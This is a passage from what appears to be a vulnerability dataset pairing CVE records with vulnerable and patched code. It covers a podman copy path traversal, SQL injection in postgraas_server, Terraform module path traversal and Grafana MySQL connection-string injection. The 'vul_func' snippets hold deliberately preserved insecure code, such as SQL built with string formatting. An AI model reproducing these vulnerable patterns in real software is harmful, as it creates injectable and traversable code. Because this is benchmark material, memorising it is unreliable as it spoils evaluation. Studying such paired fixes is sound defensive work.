where\n+\t\t\t// malicious code could mess with the symlink.\n+\t\t\tif errors.Cause(err) != libpod.ErrCtrStateInvalid {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t} else if err == nil {\n+\t\t\t// Only add the defer if we actually paused\n+\t\t\tdefer func() {\n+\t\t\t\tif err := ctr.Unpause(); err != nil {\n+\t\t\t\t\tlogrus.Errorf(\"Error unpausing container after copying: %v\", err)\n+\t\t\t\t}\n+\t\t\t}()\n+\t\t}\n+\t}\n+\n \tuser, err := getUser(mountPoint, ctr.User())\n \tif err != nil {\n \t\treturn err\n@@ -40,19 +72,38 @@\n \tvar glob []string\n \tif isFromHostToCtr {\n \t\tif filepath.IsAbs(destPath) {\n-\t\t\tdestPath = filepath.Join(mountPoint, destPath)\n-\n+\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, destPath)\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tdestPath = cleanedPath\n \t\t} else {\n-\t\t\tif err = idtools.MkdirAllAndChownNew(filepath.Join(mountPoint, ctr.WorkingDir()), 0755, hostOwner); err != nil {\n+\t\t\tctrWorkDir, err := securejoin.SecureJoin(mountPoint, ctr.WorkingDir())\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tif err = idtools.MkdirAllAndChownNew(ctrWorkDir, 0755, hostOwner); err != nil {\n \t\t\t\treturn errors.Wrapf(err, \"error creating directory %q\", destPath)\n \t\t\t}\n-\t\t\tdestPath = filepath.Join(mountPoint, ctr.WorkingDir(), destPath)\n+\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, filepath.Join(ctr.WorkingDir(), destPath))\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tdestPath = cleanedPath\n \t\t}\n \t} else {\n \t\tif filepath.IsAbs(srcPath) {\n-\t\t\tsrcPath = filepath.Join(mountPoint, srcPath)\n+\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, srcPath)\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tsrcPath = cleanedPath\n \t\t} else {\n-\t\t\tsrcPath = filepath.Join(mountPoint, ctr.WorkingDir(), srcPath)\n+\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, filepath.Join(ctr.WorkingDir(), srcPath))\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tsrcPath = cleanedPath\n \t\t}\n \t}\n \tglob, err = filepath.Glob(srcPath)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-25088", "cve_description": "A vulnerability, which was classified as critical, was found in Blue Yonder postgraas_server up to 2.0.0b2. Affected is the function _create_pg_connection/create_postgres_db of the file postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py of the component PostgreSQL Backend Handler. The manipulation leads to sql injection. Upgrading to version 2.0.0 is able to address this issue. The patch is identified as 7cd8d016edc74a78af0d81c948bfafbcc93c937c. It is recommended to upgrade the affected component. VDB-234246 is the identifier assigned to this vulnerability.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/blue-yonder/postgraas_server", "patch_url": ["https://github.com/blue-yonder/postgraas_server/commit/7cd8d016edc74a78af0d81c948bfafbcc93c937c"], "programing_language": "Python", "vul_func": [{"id": "vul_py_232_1", "commit": "bd4f1b8", "file_path": "postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py", "start_line": 19, "end_line": 27, "snippet": "def check_db_or_user_exists(db_name, db_user, config):\n with _create_pg_connection(config) as con:\n with con.cursor() as cur:\n cur.execute(\"SELECT 1 FROM pg_database WHERE datname='{}';\".format(db_name))\n db_exists = cur.fetchone() is not None\n cur.execute(\"SELECT 1 FROM pg_roles WHERE rolname='{}';\".format(db_user))\n user = cur.fetchone()\n user_exists = user is not None\n return db_exists or user_exists"}, {"id": "vul_py_232_2", "commit": "bd4f1b8", "file_path": "postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py", "start_line": 30, "end_line": 53, "snippet": "def create_postgres_db(connection_dict, config):\n if check_db_or_user_exists(connection_dict[\"db_name\"], connection_dict[\"db_username\"], config):\n raise ValueError(\"db or user already exists\")\n with _create_pg_connection(config) as con:\n con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n with con.cursor() as cur:\n create_role = \"CREATE USER {db_username} WITH PASSWORD '{db_pwd}';\".format(**connection_dict)\n drop_role = \"DROP ROLE {db_username};\".format(**connection_dict)\n grant_role = 'GRANT {db_username} TO \"{postgraas_user}\";'.format(\n db_username=connection_dict['db_username'], postgraas_user=get_normalized_username(config['username'])\n )\n create_database = \"CREATE DATABASE {db_name} OWNER {db_username};\".format(**connection_dict)\n try:\n cur.execute(create_role)\n cur.execute(grant_role)\n except psycopg2.ProgrammingError as e:\n raise ValueError(e.args[0])\n # cleanup role in case database creation fails\n # saidly 'CREATE DATABASE' cannot run inside a transaction block\n try:\n cur.execute(create_database)\n except psycopg2.ProgrammingError as e:\n cur.execute(drop_role)\n raise ValueError(e.args[0])"}], "fix_func": [{"id": "fix_py_232_1", "commit": "7cd8d01", "file_path": "postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py", "start_line": 20, "end_line": 28, "snippet": "def check_db_or_user_exists(db_name, db_user, config):\n with _create_pg_connection(config) as con:\n with con.cursor() as cur:\n cur.execute(\"SELECT 1 FROM pg_database WHERE datname=%s;\", (db_name, ))\n db_exists = cur.fetchone() is not None\n cur.execute(\"SELECT 1 FROM pg_roles WHERE rolname=%s;\", (db_user, ))\n user = cur.fetchone()\n user_exists = user is not None\n return db_exists or user_exists"}, {"id": "fix_py_232_2", "commit": "7cd8d01", "file_path": "postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py", "start_line": 31, "end_line": 60, "snippet": "def create_postgres_db(connection_dict, config):\n if check_db_or_user_exists(connection_dict[\"db_name\"], connection_dict[\"db_username\"], config):\n raise ValueError(\"db or user already exists\")\n with _create_pg_connection(config) as con:\n con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n with con.cursor() as cur:\n try:\n cur.execute(SQL(\"CREATE USER {} WITH PASSWORD %s;\").format(\n Identifier(connection_dict['db_username']),\n ), (\n connection_dict['db_pwd'],\n ))\n cur.execute(SQL(\"GRANT {} TO {};\").format(\n Identifier(connection_dict['db_username']),\n Identifier(get_normalized_username(config['username'])),\n ))\n except psycopg2.ProgrammingError as e:\n raise ValueError(e.args[0])\n # cleanup role in case database creation fails\n # sadly 'CREATE DATABASE' cannot run inside a transaction block\n try:\n cur.execute(SQL(\"CREATE DATABASE {} OWNER {};\").format(\n Identifier(connection_dict['db_name']),\n Identifier(connection_dict['db_username']),\n ))\n except psycopg2.ProgrammingError as e:\n cur.execute(SQL(\"DROP ROLE {};\").format(\n Identifier(connection_dict['db_username']),\n ))\n raise ValueError(e.args[0])"}], "vul_patch": "--- a/postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py\n+++ b/postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py\n@@ -1,9 +1,9 @@\n def check_db_or_user_exists(db_name, db_user, config):\n with _create_pg_connection(config) as con:\n with con.cursor() as cur:\n- cur.execute(\"SELECT 1 FROM pg_database WHERE datname='{}';\".format(db_name))\n+ cur.execute(\"SELECT 1 FROM pg_database WHERE datname=%s;\", (db_name, ))\n db_exists = cur.fetchone() is not None\n- cur.execute(\"SELECT 1 FROM pg_roles WHERE rolname='{}';\".format(db_user))\n+ cur.execute(\"SELECT 1 FROM pg_roles WHERE rolname=%s;\", (db_user, ))\n user = cur.fetchone()\n user_exists = user is not None\n return db_exists or user_exists\n\n--- a/postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py\n+++ b/postgraas_server/backends/postgres_cluster/postgres_cluster_driver.py\n@@ -4,21 +4,27 @@\n with _create_pg_connection(config) as con:\n con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n with con.cursor() as cur:\n- create_role = \"CREATE USER {db_username} WITH PASSWORD '{db_pwd}';\".format(**connection_dict)\n- drop_role = \"DROP ROLE {db_username};\".format(**connection_dict)\n- grant_role = 'GRANT {db_username} TO \"{postgraas_user}\";'.format(\n- db_username=connection_dict['db_username'], postgraas_user=get_normalized_username(config['username'])\n- )\n- create_database = \"CREATE DATABASE {db_name} OWNER {db_username};\".format(**connection_dict)\n try:\n- cur.execute(create_role)\n- cur.execute(grant_role)\n+ cur.execute(SQL(\"CREATE USER {} WITH PASSWORD %s;\").format(\n+ Identifier(connection_dict['db_username']),\n+ ), (\n+ connection_dict['db_pwd'],\n+ ))\n+ cur.execute(SQL(\"GRANT {} TO {};\").format(\n+ Identifier(connection_dict['db_username']),\n+ Identifier(get_normalized_username(config['username'])),\n+ ))\n except psycopg2.ProgrammingError as e:\n raise ValueError(e.args[0])\n # cleanup role in case database creation fails\n- # saidly 'CREATE DATABASE' cannot run inside a transaction block\n+ # sadly 'CREATE DATABASE' cannot run inside a transaction block\n try:\n- cur.execute(create_database)\n+ cur.execute(SQL(\"CREATE DATABASE {} OWNER {};\").format(\n+ Identifier(connection_dict['db_name']),\n+ Identifier(connection_dict['db_username']),\n+ ))\n except psycopg2.ProgrammingError as e:\n- cur.execute(drop_role)\n+ cur.execute(SQL(\"DROP ROLE {};\").format(\n+ Identifier(connection_dict['db_username']),\n+ ))\n raise ValueError(e.args[0])\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-4782", "cve_description": "Terraform version 1.0.8 through 1.5.6 allows arbitrary file write during the `init` operation if run on maliciously crafted Terraform configuration. This vulnerability is fixed in Terraform 1.5.7.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/hashicorp/terraform", "patch_url": ["https://github.com/hashicorp/terraform/commit/0f2314fb62193c4be94328cc026fcb7ec1e9b893"], "programing_language": "Go", "vul_func": [{"id": "vul_go_265_1", "commit": "1c3e25b0fda77460c40387f5ebe10c59893a7d11", "file_path": "internal/initwd/module_install.go", "start_line": 144, "end_line": 284, "snippet": "func (i *ModuleInstaller) moduleInstallWalker(ctx context.Context, manifest modsdir.Manifest, upgrade bool, hooks ModuleInstallHooks, fetcher *getmodules.PackageFetcher) configs.ModuleWalker {\n\treturn configs.ModuleWalkerFunc(\n\t\tfunc(req *configs.ModuleRequest) (*configs.Module, *version.Version, hcl.Diagnostics) {\n\t\t\tvar diags hcl.Diagnostics\n\n\t\t\tif req.SourceAddr == nil {\n\t\t\t\t// If the parent module failed to parse the module source\n\t\t\t\t// address, we can't load it here. Return nothing as the parent\n\t\t\t\t// module's diagnostics should explain this.\n\t\t\t\treturn nil, nil, diags\n\t\t\t}\n\n\t\t\tif req.Name == \"\" {\n\t\t\t\t// An empty string for a module instance name breaks our\n\t\t\t\t// manifest map, which uses that to indicate the root module.\n\t\t\t\t// Because we descend into modules which have errors, we need\n\t\t\t\t// to look out for this case, but the config loader's\n\t\t\t\t// diagnostics will report the error later.\n\t\t\t\treturn nil, nil, diags\n\t\t\t}\n\n\t\t\tkey := manifest.ModuleKey(req.Path)\n\t\t\tinstPath := i.packageInstallPath(req.Path)\n\n\t\t\tlog.Printf(\"[DEBUG] Module installer: begin %s\", key)\n\n\t\t\t// First we'll check if we need to upgrade/replace an existing\n\t\t\t// installed module, and delete it out of the way if so.\n\t\t\treplace := upgrade\n\t\t\tif !replace {\n\t\t\t\trecord, recorded := manifest[key]\n\t\t\t\tswitch {\n\t\t\t\tcase !recorded:\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s is not yet installed\", key)\n\t\t\t\t\treplace = true\n\t\t\t\tcase record.SourceAddr != req.SourceAddr.String():\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s source address has changed from %q to %q\", key, record.SourceAddr, req.SourceAddr)\n\t\t\t\t\treplace = true\n\t\t\t\tcase record.Version != nil && !req.VersionConstraint.Required.Check(record.Version):\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s version %s no longer compatible with constraints %s\", key, record.Version, req.VersionConstraint.Required)\n\t\t\t\t\treplace = true\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// If we _are_ planning to replace this module, then we'll remove\n\t\t\t// it now so our installation code below won't conflict with any\n\t\t\t// existing remnants.\n\t\t\tif replace {\n\t\t\t\tif _, recorded := manifest[key]; recorded {\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: discarding previous record of %s prior to reinstall\", key)\n\t\t\t\t}\n\t\t\t\tdelete(manifest, key)\n\t\t\t\t// Deleting a module invalidates all of its descendent modules too.\n\t\t\t\tkeyPrefix := key + \".\"\n\t\t\t\tfor subKey := range manifest {\n\t\t\t\t\tif strings.HasPrefix(subKey, keyPrefix) {\n\t\t\t\t\t\tif _, recorded := manifest[subKey]; recorded {\n\t\t\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: also discarding downstream %s\", subKey)\n\t\t\t\t\t\t}\n\t\t\t\t\t\tdelete(manifest, subKey)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\trecord, recorded := manifest[key]\n\t\t\tif !recorded {\n\t\t\t\t// Clean up any stale cache directory that might be present.\n\t\t\t\t// If this is a local (relative) source then the dir will\n\t\t\t\t// not exist, but we'll ignore that.\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: cleaning directory %s prior to install of %s\", instPath, key)\n\t\t\t\terr := os.RemoveAll(instPath)\n\t\t\t\tif err != nil && !os.IsNotExist(err) {\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: failed to remove %s: %s\", key, err)\n\t\t\t\t\tdiags = diags.Append(&hcl.Diagnostic{\n\t\t\t\t\t\tSeverity: hcl.DiagError,\n\t\t\t\t\t\tSummary: \"Failed to remove local module cache\",\n\t\t\t\t\t\tDetail: fmt.Sprintf(\n\t\t\t\t\t\t\t\"Terraform tried to remove %s in order to reinstall this module, but encountered an error: %s\",\n\t\t\t\t\t\t\tinstPath, err,\n\t\t\t\t\t\t),\n\t\t\t\t\t})\n\t\t\t\t\treturn nil, nil, diags\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t// If this module is already recorded and its root directory\n\t\t\t\t// exists then we will just load what's already there and\n\t\t\t\t// keep our existing record.\n\t\t\t\tinfo, err := os.Stat(record.Dir)\n\t\t\t\tif err == nil && info.IsDir() {\n\t\t\t\t\tmod, mDiags := i.loader.Parser().LoadConfigDir(record.Dir)\n\t\t\t\t\tif mod == nil {\n\t\t\t\t\t\t// nil indicates an unreadable module, which should never happen,\n\t\t\t\t\t\t// so we return the full loader diagnostics here.\n\t\t\t\t\t\tdiags = diags.Extend(mDiags)\n\t\t\t\t\t} else if vDiags := mod.CheckCoreVersionRequirements(req.Path, req.SourceAddr); vDiags.HasErrors() {\n\t\t\t\t\t\t// If the core version requirements are not met, we drop any other\n\t\t\t\t\t\t// diagnostics, as they may reflect language changes from future\n\t\t\t\t\t\t// Terraform versions.\n\t\t\t\t\t\tdiags = diags.Extend(vDiags)\n\t\t\t\t\t} else {\n\t\t\t\t\t\tdiags = diags.Extend(mDiags)\n\t\t\t\t\t}\n\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: Module installer: %s %s already installed in %s\", key, record.Version, record.Dir)\n\t\t\t\t\treturn mod, record.Version, diags\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// If we get down here then it's finally time to actually install\n\t\t\t// the module. There are some variants to this process depending\n\t\t\t// on what type of module source address we have.\n\n\t\t\tswitch addr := req.SourceAddr.(type) {\n\n\t\t\tcase addrs.ModuleSourceLocal:\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s has local path %q\", key, addr.String())\n\t\t\t\tmod, mDiags := i.installLocalModule(req, key, manifest, hooks)\n\t\t\t\tmDiags = maybeImproveLocalInstallError(req, mDiags)\n\t\t\t\tdiags = append(diags, mDiags...)\n\t\t\t\treturn mod, nil, diags\n\n\t\t\tcase addrs.ModuleSourceRegistry:\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s is a registry module at %s\", key, addr.String())\n\t\t\t\tmod, v, mDiags := i.installRegistryModule(ctx, req, key, instPath, addr, manifest, hooks, fetcher)\n\t\t\t\tdiags = append(diags, mDiags...)\n\t\t\t\treturn mod, v, diags\n\n\t\t\tcase addrs.ModuleSourceRemote:\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s address %q will be handled by go-getter\", key, addr.String())\n\t\t\t\tmod, mDiags := i.installGoGetterModule(ctx, req, key, instPath, manifest, hooks, fetcher)\n\t\t\t\tdiags = append(diags, mDiags...)\n\t\t\t\treturn mod, nil, diags\n\n\t\t\tdefault:\n\t\t\t\t// Shouldn't get here, because there are no other implementations\n\t\t\t\t// of addrs.ModuleSource.\n\t\t\t\tpanic(fmt.Sprintf(\"unsupported module source address %#v\", addr))\n\t\t\t}\n\t\t},\n\t)\n}"}], "fix_func": [{"id": "fix_go_265_1", "commit": "0f2314fb62193c4be94328cc026fcb7ec1e9b893", "file_path": "internal/initwd/module_install.go", "start_line": 144, "end_line": 291, "snippet": "func (i *ModuleInstaller) moduleInstallWalker(ctx context.Context, manifest modsdir.Manifest, upgrade bool, hooks ModuleInstallHooks, fetcher *getmodules.PackageFetcher) configs.ModuleWalker {\n\treturn configs.ModuleWalkerFunc(\n\t\tfunc(req *configs.ModuleRequest) (*configs.Module, *version.Version, hcl.Diagnostics) {\n\t\t\tvar diags hcl.Diagnostics\n\n\t\t\tif req.SourceAddr == nil {\n\t\t\t\t// If the parent module failed to parse the module source\n\t\t\t\t// address, we can't load it here. Return nothing as the parent\n\t\t\t\t// module's diagnostics should explain this.\n\t\t\t\treturn nil, nil, diags\n\t\t\t}\n\n\t\t\tif req.Name == \"\" {\n\t\t\t\t// An empty string for a module instance name breaks our\n\t\t\t\t// manifest map, which uses that to indicate the root module.\n\t\t\t\t// Because we descend into modules which have errors, we need\n\t\t\t\t// to look out for this case, but the config loader's\n\t\t\t\t// diagnostics will report the error later.\n\t\t\t\treturn nil, nil, diags\n\t\t\t}\n\n\t\t\tif !hclsyntax.ValidIdentifier(req.Name) {\n\t\t\t\t// A module with an invalid name shouldn't be installed at all. This is\n\t\t\t\t// mostly a concern for remote modules, since we need to be able to convert\n\t\t\t\t// the name to a valid path.\n\t\t\t\treturn nil, nil, diags\n\t\t\t}\n\n\t\t\tkey := manifest.ModuleKey(req.Path)\n\t\t\tinstPath := i.packageInstallPath(req.Path)\n\n\t\t\tlog.Printf(\"[DEBUG] Module installer: begin %s\", key)\n\n\t\t\t// First we'll check if we need to upgrade/replace an existing\n\t\t\t// installed module, and delete it out of the way if so.\n\t\t\treplace := upgrade\n\t\t\tif !replace {\n\t\t\t\trecord, recorded := manifest[key]\n\t\t\t\tswitch {\n\t\t\t\tcase !recorded:\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s is not yet installed\", key)\n\t\t\t\t\treplace = true\n\t\t\t\tcase record.SourceAddr != req.SourceAddr.String():\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s source address has changed from %q to %q\", key, record.SourceAddr, req.SourceAddr)\n\t\t\t\t\treplace = true\n\t\t\t\tcase record.Version != nil && !req.VersionConstraint.Required.Check(record.Version):\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s version %s no longer compatible with constraints %s\", key, record.Version, req.VersionConstraint.Required)\n\t\t\t\t\treplace = true\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// If we _are_ planning to replace this module, then we'll remove\n\t\t\t// it now so our installation code below won't conflict with any\n\t\t\t// existing remnants.\n\t\t\tif replace {\n\t\t\t\tif _, recorded := manifest[key]; recorded {\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: discarding previous record of %s prior to reinstall\", key)\n\t\t\t\t}\n\t\t\t\tdelete(manifest, key)\n\t\t\t\t// Deleting a module invalidates all of its descendent modules too.\n\t\t\t\tkeyPrefix := key + \".\"\n\t\t\t\tfor subKey := range manifest {\n\t\t\t\t\tif strings.HasPrefix(subKey, keyPrefix) {\n\t\t\t\t\t\tif _, recorded := manifest[subKey]; recorded {\n\t\t\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: also discarding downstream %s\", subKey)\n\t\t\t\t\t\t}\n\t\t\t\t\t\tdelete(manifest, subKey)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\trecord, recorded := manifest[key]\n\t\t\tif !recorded {\n\t\t\t\t// Clean up any stale cache directory that might be present.\n\t\t\t\t// If this is a local (relative) source then the dir will\n\t\t\t\t// not exist, but we'll ignore that.\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: cleaning directory %s prior to install of %s\", instPath, key)\n\t\t\t\terr := os.RemoveAll(instPath)\n\t\t\t\tif err != nil && !os.IsNotExist(err) {\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: failed to remove %s: %s\", key, err)\n\t\t\t\t\tdiags = diags.Append(&hcl.Diagnostic{\n\t\t\t\t\t\tSeverity: hcl.DiagError,\n\t\t\t\t\t\tSummary: \"Failed to remove local module cache\",\n\t\t\t\t\t\tDetail: fmt.Sprintf(\n\t\t\t\t\t\t\t\"Terraform tried to remove %s in order to reinstall this module, but encountered an error: %s\",\n\t\t\t\t\t\t\tinstPath, err,\n\t\t\t\t\t\t),\n\t\t\t\t\t})\n\t\t\t\t\treturn nil, nil, diags\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t// If this module is already recorded and its root directory\n\t\t\t\t// exists then we will just load what's already there and\n\t\t\t\t// keep our existing record.\n\t\t\t\tinfo, err := os.Stat(record.Dir)\n\t\t\t\tif err == nil && info.IsDir() {\n\t\t\t\t\tmod, mDiags := i.loader.Parser().LoadConfigDir(record.Dir)\n\t\t\t\t\tif mod == nil {\n\t\t\t\t\t\t// nil indicates an unreadable module, which should never happen,\n\t\t\t\t\t\t// so we return the full loader diagnostics here.\n\t\t\t\t\t\tdiags = diags.Extend(mDiags)\n\t\t\t\t\t} else if vDiags := mod.CheckCoreVersionRequirements(req.Path, req.SourceAddr); vDiags.HasErrors() {\n\t\t\t\t\t\t// If the core version requirements are not met, we drop any other\n\t\t\t\t\t\t// diagnostics, as they may reflect language changes from future\n\t\t\t\t\t\t// Terraform versions.\n\t\t\t\t\t\tdiags = diags.Extend(vDiags)\n\t\t\t\t\t} else {\n\t\t\t\t\t\tdiags = diags.Extend(mDiags)\n\t\t\t\t\t}\n\n\t\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: Module installer: %s %s already installed in %s\", key, record.Version, record.Dir)\n\t\t\t\t\treturn mod, record.Version, diags\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// If we get down here then it's finally time to actually install\n\t\t\t// the module. There are some variants to this process depending\n\t\t\t// on what type of module source address we have.\n\n\t\t\tswitch addr := req.SourceAddr.(type) {\n\n\t\t\tcase addrs.ModuleSourceLocal:\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s has local path %q\", key, addr.String())\n\t\t\t\tmod, mDiags := i.installLocalModule(req, key, manifest, hooks)\n\t\t\t\tmDiags = maybeImproveLocalInstallError(req, mDiags)\n\t\t\t\tdiags = append(diags, mDiags...)\n\t\t\t\treturn mod, nil, diags\n\n\t\t\tcase addrs.ModuleSourceRegistry:\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s is a registry module at %s\", key, addr.String())\n\t\t\t\tmod, v, mDiags := i.installRegistryModule(ctx, req, key, instPath, addr, manifest, hooks, fetcher)\n\t\t\t\tdiags = append(diags, mDiags...)\n\t\t\t\treturn mod, v, diags\n\n\t\t\tcase addrs.ModuleSourceRemote:\n\t\t\t\tlog.Printf(\"[TRACE] ModuleInstaller: %s address %q will be handled by go-getter\", key, addr.String())\n\t\t\t\tmod, mDiags := i.installGoGetterModule(ctx, req, key, instPath, manifest, hooks, fetcher)\n\t\t\t\tdiags = append(diags, mDiags...)\n\t\t\t\treturn mod, nil, diags\n\n\t\t\tdefault:\n\t\t\t\t// Shouldn't get here, because there are no other implementations\n\t\t\t\t// of addrs.ModuleSource.\n\t\t\t\tpanic(fmt.Sprintf(\"unsupported module source address %#v\", addr))\n\t\t\t}\n\t\t},\n\t)\n}"}], "vul_patch": "--- a/internal/initwd/module_install.go\n+++ b/internal/initwd/module_install.go\n@@ -16,6 +16,13 @@\n \t\t\t\t// Because we descend into modules which have errors, we need\n \t\t\t\t// to look out for this case, but the config loader's\n \t\t\t\t// diagnostics will report the error later.\n+\t\t\t\treturn nil, nil, diags\n+\t\t\t}\n+\n+\t\t\tif !hclsyntax.ValidIdentifier(req.Name) {\n+\t\t\t\t// A module with an invalid name shouldn't be installed at all. This is\n+\t\t\t\t// mostly a concern for remote modules, since we need to be able to convert\n+\t\t\t\t// the name to a valid path.\n \t\t\t\treturn nil, nil, diags\n \t\t\t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-19499", "cve_description": "Grafana <= 6.4.3 has an Arbitrary File Read vulnerability, which could be exploited by an authenticated attacker that has privileges to modify the data source configurations.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/grafana/grafana", "patch_url": ["https://github.com/grafana/grafana/commit/19dbd27c5caa1a160bd5854b65a4e1fe2a8a4f00"], "programing_language": "Go", "vul_func": [{"id": "vul_go_30_1", "commit": "8cf75b4e75be0a3561c4ff1b1cfc884206b30745", "file_path": "pkg/tsdb/mysql/mysql.go", "start_line": 27, "end_line": 72, "snippet": "func newMysqlQueryEndpoint(datasource *models.DataSource) (tsdb.TsdbQueryEndpoint, error) {\n\tlogger := log.New(\"tsdb.mysql\")\n\n\tprotocol := \"tcp\"\n\tif strings.HasPrefix(datasource.Url, \"/\") {\n\t\tprotocol = \"unix\"\n\t}\n\tcnnstr := fmt.Sprintf(\"%s:%s@%s(%s)/%s?collation=utf8mb4_unicode_ci&parseTime=true&loc=UTC&allowNativePasswords=true\",\n\t\tdatasource.User,\n\t\tdatasource.DecryptedPassword(),\n\t\tprotocol,\n\t\tdatasource.Url,\n\t\tdatasource.Database,\n\t)\n\n\ttlsConfig, err := datasource.GetTLSConfig()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif tlsConfig.RootCAs != nil || len(tlsConfig.Certificates) > 0 {\n\t\ttlsConfigString := fmt.Sprintf(\"ds%d\", datasource.Id)\n\t\tif err := mysql.RegisterTLSConfig(tlsConfigString, tlsConfig); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tcnnstr += \"&tls=\" + tlsConfigString\n\t}\n\n\tif setting.Env == setting.DEV {\n\t\tlogger.Debug(\"getEngine\", \"connection\", cnnstr)\n\t}\n\n\tconfig := sqleng.SqlQueryEndpointConfiguration{\n\t\tDriverName: \"mysql\",\n\t\tConnectionString: cnnstr,\n\t\tDatasource: datasource,\n\t\tTimeColumnNames: []string{\"time\", \"time_sec\"},\n\t\tMetricColumnTypes: []string{\"CHAR\", \"VARCHAR\", \"TINYTEXT\", \"TEXT\", \"MEDIUMTEXT\", \"LONGTEXT\"},\n\t}\n\n\trowTransformer := mysqlQueryResultTransformer{\n\t\tlog: logger,\n\t}\n\n\treturn sqleng.NewSqlQueryEndpoint(&config, &rowTransformer, newMysqlMacroEngine(logger), logger)\n}"}], "fix_func": [{"id": "fix_go_30_1", "commit": "19dbd27c5caa1a160bd5854b65a4e1fe2a8a4f00", "file_path": "pkg/tsdb/mysql/mysql.go", "start_line": 31, "end_line": 77, "snippet": "func newMysqlQueryEndpoint(datasource *models.DataSource) (tsdb.TsdbQueryEndpoint, error) {\n\tlogger := log.New(\"tsdb.mysql\")\n\n\tprotocol := \"tcp\"\n\tif strings.HasPrefix(datasource.Url, \"/\") {\n\t\tprotocol = \"unix\"\n\t}\n\n\tcnnstr := fmt.Sprintf(\"%s:%s@%s(%s)/%s?collation=utf8mb4_unicode_ci&parseTime=true&loc=UTC&allowNativePasswords=true\",\n\t\tcharacterEscape(datasource.User, \":\"),\n\t\tcharacterEscape(datasource.DecryptedPassword(), \"@\"),\n\t\tprotocol,\n\t\tcharacterEscape(datasource.Url, \")\"),\n\t\tcharacterEscape(datasource.Database, \"?\"),\n\t)\n\n\ttlsConfig, err := datasource.GetTLSConfig()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif tlsConfig.RootCAs != nil || len(tlsConfig.Certificates) > 0 {\n\t\ttlsConfigString := fmt.Sprintf(\"ds%d\", datasource.Id)\n\t\tif err := mysql.RegisterTLSConfig(tlsConfigString, tlsConfig); err != nil 